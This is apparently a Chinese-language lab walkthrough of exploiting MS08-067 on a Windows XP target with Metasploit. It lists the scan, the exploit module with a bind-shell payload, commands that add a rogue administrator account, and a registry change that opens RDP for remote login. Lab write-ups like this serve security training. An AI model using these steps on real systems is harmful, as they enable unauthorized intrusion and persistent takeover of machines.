提示:靶机 windows XP IP:172.16.5.27
攻击机 kali IP:172.16.5.28
文章目录
- 前言
- 漏洞介绍
- nmap扫描
- MS08-067利用
- 总结
前言
利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程,成功进入后渗透,开启靶机的3389远程登录
漏洞介绍:
ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞,主要针对的是windows server 2003、windows xp
一、nmap扫描
nmap -sV 172.16.5.27 -p- //全端口版本扫描
靶机已开启445端口,接下来我们就可以开始渗透了
二、MS08-067利用
msfconsole //启动msfconsole控制台
use exploit/windows/smb/ms08_067_netapi //使用模块
set rhosts 172.16.5.27 //设置靶机ip
set lhost 172.16.5.28 //设置本地ip
set payload generic/shell_bind_tcp //设置payload
exploit //运行模块
然后我们创建一个admin用户密码为123456,并给他管理员权限
net user admin 123456 /add && net localgroup administrators admin /add
靶机没有开启3389端口使用需要我们来开启
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
最后再次nmap扫描发现靶机成功开启了3389端口,我们就可以远程连接了
rdesktop 172.16.5.27 //远程连接
总结
提示:这里对文章进行总结:
例如:MS08-067漏洞利用重点在于模块设置、创建用户和开启3389远程连接,如果需要操作环境的可以联系博主,免费提供最新版kali和含有MS08-067漏洞的靶机(windowsXP)